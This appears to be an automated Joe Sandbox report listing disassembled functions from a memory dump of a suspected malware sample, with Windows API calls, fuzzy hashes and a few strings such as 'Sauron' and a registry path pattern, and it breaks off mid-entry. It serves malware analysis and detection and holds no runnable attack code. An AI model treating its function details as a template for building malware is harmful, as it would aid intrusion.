Snapshot File: hcaresult_7_2_10000000_lXAMaI.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide$CompareString
String ID:
API String ID: 376665442-0
Opcode ID: 0884d629af8c5797e3bf611fd2a1bd55e5daf018e58061e71b02e81a9dd0a427
Instruction ID: efca960d67fa8b2aa2abc17c4163607a4ca51335155959edc3c615d8a6b82ea5
Opcode Fuzzy Hash: 0884d629af8c5797e3bf611fd2a1bd55e5daf018e58061e71b02e81a9dd0a427
Instruction Fuzzy Hash: 8721E832900659EBCF218F94CD85ADEBFB5FF48750F114129FA14661A0C73299A2DF90

Function 10001592 Relevance: 6.1, APIs: 4, Instructions: 54synchronizationnetworkCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF,?,00000001,10025DE7,000000FF,?,1000837B), ref: 100015CE
CloseHandle.KERNEL32(?,?,1000837B), ref: 100015EC
CloseHandle.KERNEL32(?,?,1000837B), ref: 100015F9
WSACleanup.WS2_32 ref: 100015FF

Part of subcall function 10001C6F: setsockopt.WS2_32(?,0000FFFF,00000080,00000001,00000004), ref: 10001C9B
Part of subcall function 10001C6F: CancelIo.KERNEL32(?), ref: 10001CA8
Part of subcall function 10001C6F: InterlockedExchange.KERNEL32(?,00000000), ref: 10001CB7
Part of subcall function 10001C6F: closesocket.WS2_32(?), ref: 10001CC4
Part of subcall function 10001C6F: SetEvent.KERNEL32(?), ref: 10001CD1

Memory Dump Source

Source File: 00000007.00000002.3511821369.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.3511799085.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511854264.0000000010027000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010052000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010057000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010059000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_lXAMaI.jbxd

Yara matches

Similarity

API ID: CloseHandle$CancelCleanupEventExchangeInterlockedObjectSingleWaitclosesocketsetsockopt
String ID:
API String ID: 136543108-0
Opcode ID: c39b269d705170409c064a28a828f0abf7245d9de51d699ea4b1b14bf3ffa78f
Instruction ID: bac0b121c0c9286dd5aa07ff7ee03cf675cd1885efae12546391e48da114f2b6
Opcode Fuzzy Hash: c39b269d705170409c064a28a828f0abf7245d9de51d699ea4b1b14bf3ffa78f
Instruction Fuzzy Hash: A3219D7490029ADFDB04DF98CC94BAEBB75FF44358F200688E4226B3D2CB75A902CB10

Function 100232E9 Relevance: 6.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,?), ref: 100232F4
GetTopWindow.USER32(00000000), ref: 10023307
GetTopWindow.USER32(?), ref: 10023337
GetWindow.USER32(00000000,00000002), ref: 10023352

Memory Dump Source

Source File: 00000007.00000002.3511821369.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.3511799085.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511854264.0000000010027000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010052000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010057000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010059000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_lXAMaI.jbxd

Yara matches

Similarity

API ID: Window$Item
String ID:
API String ID: 369458955-0
Opcode ID: 97be90c594a7b2175b3452feee84b3bc0282e9d3b13ef19c2c3fb246dcc947ac
Instruction ID: 677b64f70279de298bbc154f9feee02de8a2f848aafa3c7f6a9ad8e556be5ffb
Opcode Fuzzy Hash: 97be90c594a7b2175b3452feee84b3bc0282e9d3b13ef19c2c3fb246dcc947ac
Instruction Fuzzy Hash: EA014B36501266A7DB12EF61AC01E9F3BA9EF196A4BC6C021FD04A1021DB31DB219AE5

Function 10002301 Relevance: 6.0, APIs: 4, Instructions: 49processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 10002318
Process32First.KERNEL32(?,00000128), ref: 10002335
Process32Next.KERNEL32(?,00000128), ref: 10002360
CloseHandle.KERNEL32(?,?,00000128,00000002,00000000), ref: 10002396

Memory Dump Source

Source File: 00000007.00000002.3511821369.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.3511799085.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511854264.0000000010027000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010052000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010057000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010059000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_lXAMaI.jbxd

Yara matches

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: d32d682be4506ac048304fc161a69b9bb718e216378cc09d8df9d6ae17944da5
Instruction ID: 99715ad90c71c50d1af38fb9c26db18b889a14b3bfc4e211dec783c8c6c07720
Opcode Fuzzy Hash: d32d682be4506ac048304fc161a69b9bb718e216378cc09d8df9d6ae17944da5
Instruction Fuzzy Hash: 02118478900218ABEB20DB60CD41BCE73F9EB49384F1084D9ED48A6244E778EF908F90

Function 10023362 Relevance: 6.0, APIs: 4, Instructions: 49windowCOMMON

Download Yara Rule

APIs

GetTopWindow.USER32(?), ref: 10023370
SendMessageA.USER32(00000000,?,?,?), ref: 100233A6
GetTopWindow.USER32(00000000), ref: 100233B3
GetWindow.USER32(00000000,00000002), ref: 100233D1

Memory Dump Source

Source File: 00000007.00000002.3511821369.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.3511799085.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511854264.0000000010027000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010052000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010057000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010059000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_lXAMaI.jbxd

Yara matches

Similarity

API ID: Window$MessageSend
String ID:
API String ID: 1496643700-0
Opcode ID: b67786f19d2818e678e4235663c76fde75c496f4f98160c723910be47e4cfe48
Instruction ID: 9d9c3928b7eb2828485760e67a874c0e74ce3cecfd2c7e9eba821c2d3307250f
Opcode Fuzzy Hash: b67786f19d2818e678e4235663c76fde75c496f4f98160c723910be47e4cfe48
Instruction Fuzzy Hash: 2901D736000219BBCF02EF91AC05EDF3B6AFF49750F818011FA0495021CB36CB62EBA1

Function 100217DA Relevance: 6.0, APIs: 4, Instructions: 48windowCOMMON

Download Yara Rule

APIs

EnableMenuItem.USER32(?,?,?), ref: 10021802
GetFocus.USER32 ref: 10021815
GetParent.USER32(?), ref: 10021823
GetNextDlgTabItem.USER32(?,?,00000000), ref: 1002183F

Memory Dump Source

Source File: 00000007.00000002.3511821369.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.3511799085.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511854264.0000000010027000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010052000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010057000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010059000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_lXAMaI.jbxd

Yara matches

Similarity

API ID: Item$EnableFocusMenuNextParent
String ID:
API String ID: 988757621-0
Opcode ID: d297ecdc865270b06f2d88ca973610ee3d857fb318abd1bc8a71c56bcb4a8f61
Instruction ID: 5ced8c62367298ee106ba903e58059ba20313dca2757242c66bebccb0cbab45d
Opcode Fuzzy Hash: d297ecdc865270b06f2d88ca973610ee3d857fb318abd1bc8a71c56bcb4a8f61
Instruction Fuzzy Hash: 89118E34100610ABDB28DF20EC99B9AB7FAFF50751F624A1CF946821A0CB70F881CB11

Function 02E34600 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

TlsGetValue.KERNEL32(00000000,?,02E34679,00000000,02E3B71A,02E486B8,00000000,00000314,?,02E39281,02E486B8,Microsoft Visual C++ Runtime Library,00012010), ref: 02E34612
TlsGetValue.KERNEL32(0000000A,?,02E34679,00000000,02E3B71A,02E486B8,00000000,00000314,?,02E39281,02E486B8,Microsoft Visual C++ Runtime Library,00012010), ref: 02E34629

Strings

EncodePointer, xrefs: 02E34654
KERNEL32.DLL, xrefs: 02E34639, 02E3463E, 02E34649

Memory Dump Source

Source File: 00000007.00000002.3509189589.0000000002E1C000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: true

Associated: 00000007.00000002.3509065255.0000000002DE0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3509093359.0000000002DE1000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3509129783.0000000002DFD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3509159172.0000000002E06000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3509228018.0000000002E45000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3509260744.0000000002E4B000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3509506069.00000000030AF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2de0000_lXAMaI.jbxd

Similarity

API ID: Value
String ID: EncodePointer$KERNEL32.DLL
API String ID: 3702945584-3682587211
Opcode ID: 451f57c273ef47a4fc1a58fb34579d8c738ae4434ddaf61f294efb124fe3b4a7
Instruction ID: 051ece940173f527d023f0b2cfb40df64898c5936057acc464b6e82e9e876966
Opcode Fuzzy Hash: 451f57c273ef47a4fc1a58fb34579d8c738ae4434ddaf61f294efb124fe3b4a7
Instruction Fuzzy Hash: 27F0C8749C051AAB5B126E6AEC08EAB3FDD9F402AA7559161FC1CD20D1DB30D851CEE4

Function 100238F1 Relevance: 6.0, APIs: 4, Instructions: 43COMMON

Download Yara Rule

APIs

GetObjectA.GDI32(00000000,0000000C,?), ref: 1002392F
SetBkColor.GDI32(00000000,00000000), ref: 1002393B
GetSysColor.USER32(00000008), ref: 1002394B
SetTextColor.GDI32(00000000,?), ref: 10023955

Part of subcall function 100243BC: GetWindowLongA.USER32(00000000,000000F0), ref: 100243CD

Memory Dump Source

Source File: 00000007.00000002.3511821369.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.3511799085.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511854264.0000000010027000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010052000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010057000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010059000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_lXAMaI.jbxd

Yara matches

Similarity

API ID: Color$LongObjectTextWindow
String ID:
API String ID: 2871169696-0
Opcode ID: 13d9c93d3c333073aa744f3977239359578e89e420999d5a7b347b8326d30141
Instruction ID: e4578b15dee9332c2c83ca90c7ab0421fd37466eddcec9d8dcea5b69a2f7c378
Opcode Fuzzy Hash: 13d9c93d3c333073aa744f3977239359578e89e420999d5a7b347b8326d30141
Instruction Fuzzy Hash: 5F014F31504109ABEF11DF64ECC6B9E3BA8FB01380F908515F906E51E0C7B0CDD5DA51

Function 10004ECE Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 32stringCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 10004EE8
strlen.MSVCRT ref: 10004F0B

Strings

Sauron, xrefs: 10004ED7
SOFTWARE\%s, xrefs: 10004EDC

Memory Dump Source

Source File: 00000007.00000002.3511821369.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.3511799085.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511854264.0000000010027000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010052000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010057000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010059000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_lXAMaI.jbxd

Yara matches

Similarity

API ID: strlenwsprintf
String ID: SOFTWARE\%s$Sauron
API String ID: 350797232-2972710817
Opcode ID: 74ee05ce7e63846cf0ca64918b709cd4d02f8d448eeea228ad7a5ba4f0a5f695
Instruction ID: 7060d33c99a8d32bb1fbd216d8fdb52c809eefcb7a33bc9abf729a8a4942ff72
Opcode Fuzzy Hash: 74ee05ce7e63846cf0ca64918b709cd4d02f8d448eeea228ad7a5ba4f0a5f695
Instruction Fuzzy Hash: 09F0B475900108FBD700DF94DC45FE93738EB00304F5081A8FE4957142DBB6AB948FA5

Function 00433E04 Relevance: 6.0, APIs: 4, Instructions: 31COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 00433E10

Part of subcall function 00432345: __getptd_noexit.LIBCMT ref: 00432348
Part of subcall function 00432345: __amsg_exit.LIBCMT ref: 00432355

__getptd.LIBCMT ref: 00433E27
__amsg_exit.LIBCMT ref: 00433E35
__lock.LIBCMT ref: 00433E45

Memory Dump Source

Source File: 00000007.00000002.3502605528.0000000000431000.00000020.00000001.01000000.00000009.sdmp, Offset: 00430000, based on PE: true

Associated: 00000007.00000002.3502562365.0000000000430000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3502638996.0000000000438000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3502674482.000000000043A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3502714188.000000000043C000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_430000_lXAMaI.jbxd

Similarity

API ID: __amsg_exit__getptd$__getptd_noexit__lock
String ID:
API String ID: 3521780317-0
Opcode ID: 3b68c028eed2fa4857489034c8cc8094b829dc85501be26c652567ecf2dca876
Instruction ID: 912ececf2e97972400bf4f06bd9525e42f92cfeb8a66755e828b062439c20ba6
Opcode Fuzzy Hash: 3b68c028eed2fa4857489034c8cc8094b829dc85501be26c652567ecf2dca876
Instruction Fuzzy Hash: 50F090329407109BD720FFB6850774D72A0AF5CB25F60655FE441972E1CFBC9A418B5E

Function 10024479 Relevance: 6.0, APIs: 4, Instructions: 30stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(?), ref: 10024488
GetWindowTextA.USER32(?,?,00000100), ref: 100244A4
lstrcmpA.KERNEL32(?,?), ref: 100244B8
SetWindowTextA.USER32(?,?), ref: 100244C8

Memory Dump Source

Source File: 00000007.00000002.3511821369.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.3511799085.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511854264.0000000010027000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010052000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010057000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010059000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_lXAMaI.jbxd

Yara matches

Similarity

API ID: TextWindow$lstrcmplstrlen
String ID:
API String ID: 330964273-0
Opcode ID: 50c5982255828aee3cd3bd47afc453625b46a47d6e9989008d091dc25886bd5b
Instruction ID: d0ce5acbac4a1c78eee4318082a0068dc17d21a56c55b9890dc0e4e2f9ed147c
Opcode Fuzzy Hash: 50c5982255828aee3cd3bd47afc453625b46a47d6e9989008d091dc25886bd5b
Instruction Fuzzy Hash: 5CF0F831500029BBEF12AF24DC88BD97BB9FB08790F558261FD4DE5160DB70DEA69B90

Function 035B1346 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,00000000,?,035AFF95,00000000,00000001,00000000,?,?,035AEB74,?,00000000,00000000), ref: 035B135D
GetLastError.KERNEL32(?,035AFF95,00000000,00000001,00000000,?,?,035AEB74,?,00000000,00000000,?,?,?,035AF117,00000000), ref: 035B1369

Part of subcall function 035B132F: CloseHandle.KERNEL32(FFFFFFFE,035B1379,?,035AFF95,00000000,00000001,00000000,?,?,035AEB74,?,00000000,00000000,?,?), ref: 035B133F

___initconout.LIBCMT ref: 035B1379

Part of subcall function 035B12F1: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,035B1320,035AFF82,?,?,035AEB74,?,00000000,00000000,?), ref: 035B1304

WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,?,035AFF95,00000000,00000001,00000000,?,?,035AEB74,?,00000000,00000000,?), ref: 035B138E

Memory Dump Source

Source File: 00000007.00000002.3509857649.00000000035A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_35a0000_lXAMaI.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: 08266591e0f48f67537125e04f1e52afdc4f98f242941f2942ff82e00cc323f1
Instruction ID: 9f7e736f65c19840707f3f9d817cdbb45fba84e1334843aa3a65af3bc45d3f55
Opcode Fuzzy Hash: 08266591e0f48f67537125e04f1e52afdc4f98f242941f2942ff82e00cc323f1
Instruction Fuzzy Hash: D3F0F83A40061DBBCFA27F95AC04D993F7AFF482A0B044050FA5995530E6328965AB90

Function 1002447B Relevance: 6.0, APIs: 4, Instructions: 29stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(?), ref: 10024488
GetWindowTextA.USER32(?,?,00000100), ref: 100244A4
lstrcmpA.KERNEL32(?,?), ref: 100244B8
SetWindowTextA.USER32(?,?), ref: 100244C8

Memory Dump Source

Source File: 00000007.00000002.3511821369.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.3511799085.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511854264.0000000010027000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010052000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010057000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010059000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_lXAMaI.jbxd

Yara matches

Similarity

API ID: TextWindow$lstrcmplstrlen
String ID:
API String ID: 330964273-0
Opcode ID: b89cc321c2b3bc6406a7d8ac7bd2e86ae4e6864dcdb84b9d9b93d6414a7c7e37
Instruction ID: 8858c43026ea55818d7eb0bd817e7ed508452b40fc45fe671657411902691236
Opcode Fuzzy Hash: b89cc321c2b3bc6406a7d8ac7bd2e86ae4e6864dcdb84b9d9b93d6414a7c7e37
Instruction Fuzzy Hash: 34F0F831500029ABDF12AF24DC88AD97BB9FB08790F558261FD4DD5160DB70DEA59B90

Function 03611346 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,00000000,?,0360FF95,00000000,00000001,00000000,?,?,0360EB74,?,00000000,00000000), ref: 0361135D
GetLastError.KERNEL32(?,0360FF95,00000000,00000001,00000000,?,?,0360EB74,?,00000000,00000000,?,?,?,0360F117,00000000), ref: 03611369

Part of subcall function 0361132F: CloseHandle.KERNEL32(FFFFFFFE,03611379,?,0360FF95,00000000,00000001,00000000,?,?,0360EB74,?,00000000,00000000,?,?), ref: 0361133F

___initconout.LIBCMT ref: 03611379

Part of subcall function 036112F1: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,03611320,0360FF82,?,?,0360EB74,?,00000000,00000000,?), ref: 03611304

WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,?,0360FF95,00000000,00000001,00000000,?,?,0360EB74,?,00000000,00000000,?), ref: 0361138E

Memory Dump Source

Source File: 00000007.00000002.3509918905.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3600000_lXAMaI.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: c32a60a2c61e81d2af0d0fb4270871f2c757200db3a32054d5c73e53061c9b87
Instruction ID: fd708646db960bbb571ed05fb0a74e5b72ac60fec7db398bd2b8773f94ac2439
Opcode Fuzzy Hash: c32a60a2c61e81d2af0d0fb4270871f2c757200db3a32054d5c73e53061c9b87
Instruction Fuzzy Hash: 54F0303A400219BBCF227F95DC0499D3F6AFB497B1F1C4011FA5D96628CB328970EB90

Function 1000BB63 Relevance: 6.0, APIs: 4, Instructions: 20servicesleepregistryCOMMON

Download Yara Rule

APIs

CloseServiceHandle.ADVAPI32(00000000), ref: 1000BB73
CloseServiceHandle.ADVAPI32(00000000), ref: 1000BB89
RegCloseKey.ADVAPI32(00000000), ref: 1000BB9F
Sleep.KERNEL32(000001F4), ref: 1000BBAA

Memory Dump Source

Source File: 00000007.00000002.3511821369.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.3511799085.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511854264.0000000010027000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010052000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010057000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010059000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_lXAMaI.jbxd

Yara matches

Similarity

API ID: Close$HandleService$Sleep
String ID:
API String ID: 994006413-0
Opcode ID: 8d7c6293ad7ec1e9bf73abedecfc7320e898b341ae5a6b1d66607c622a96f3ab
Instruction ID: 98e8a96e47dfe227fe3c99dcf1eed1d282116de4c6b30a78707c833fb7a19cce
Opcode Fuzzy Hash: 8d7c6293ad7ec1e9bf73abedecfc7320e898b341ae5a6b1d66607c622a96f3ab
Instruction Fuzzy Hash: 97E0C974801225DBE762AFA0CC897ED77B9FB44781F604598E10D550A8CB74AFC9CF10

Function 100168AF Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 124COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(?,?), ref: 100168C3

Strings

, xrefs: 100168E8
, xrefs: 1001690C

Memory Dump Source

Source File: 00000007.00000002.3511821369.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.3511799085.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511854264.0000000010027000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010052000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010057000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010059000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_lXAMaI.jbxd

Yara matches

Similarity

API ID: Info
String ID: $
API String ID: 1807457897-3032137957
Opcode ID: b0c9df77df4460fe084575e726dca8dc16adb4dab16ee5829d6560fc2b278d4e
Instruction ID: 2dea47a5405656d38942e691cdaa6fd242ddfba0aae83e6b5db2ae9eaeda7e15
Opcode Fuzzy Hash: b0c9df77df4460fe084575e726dca8dc16adb4dab16ee5829d6560fc2b278d4e
Instruction Fuzzy Hash: 504127315043A85BEB15CA54CD99BEA7FEDEF0A740F1000F5D586DF092C63589C4DBA2

Function 035A38E1 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

EncodePointer.KERNEL32(00000000,?), ref: 035A3906

Strings

MOC, xrefs: 035A3918
RCC, xrefs: 035A3920

Memory Dump Source

Source File: 00000007.00000002.3509857649.00000000035A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_35a0000_lXAMaI.jbxd

Similarity

API ID: EncodePointer
String ID: MOC$RCC
API String ID: 2118026453-2084237596
Opcode ID: 1be3dfb527d3ba27fde7e1229a3c9124798656623eaa74c0f6a63963161ef83d
Instruction ID: dbc36405a8de47900b7b1e16d6291bf92fa3f1b8aafa5a82937f19865d0b88d6
Opcode Fuzzy Hash: 1be3dfb527d3ba27fde7e1229a3c9124798656623eaa74c0f6a63963161ef83d
Instruction Fuzzy Hash: 2A415B79900609AFCF15DF98ED81AEEBBB5FF48308F188199F9046B221D3359950EB50

Function 036038E1 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

EncodePointer.KERNEL32(00000000,?), ref: 03603906

Strings

MOC, xrefs: 03603918
RCC, xrefs: 03603920

Memory Dump Source

Source File: 00000007.00000002.3509918905.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3600000_lXAMaI.jbxd

Similarity

API ID: EncodePointer
String ID: MOC$RCC
API String ID: 2118026453-2084237596
Opcode ID: b44b966638bb00f45ff7b544547e84234a65ead916ef9b17fa0f89a72b97da84
Instruction ID: b386669b8ef2795f7905e417e16be517547489ec25395e417c7e182161c33a5e
Opcode Fuzzy Hash: b44b966638bb00f45ff7b544547e84234a65ead916ef9b17fa0f89a72b97da84
Instruction Fuzzy Hash: B6418D35900209AFCF19CF98CD82AAEBBB5FF08301F288199F9447A390E335D950DB54

Function 10008C13 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 91COMMON

Download Yara Rule

Strings

c:\%s, xrefs: 10008CAE

Memory Dump Source

Source File: 00000007.00000002.3511821369.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.3511799085.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511854264.0000000010027000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010052000.00000004.00001000.00020000.00000000.sdmpDownload File
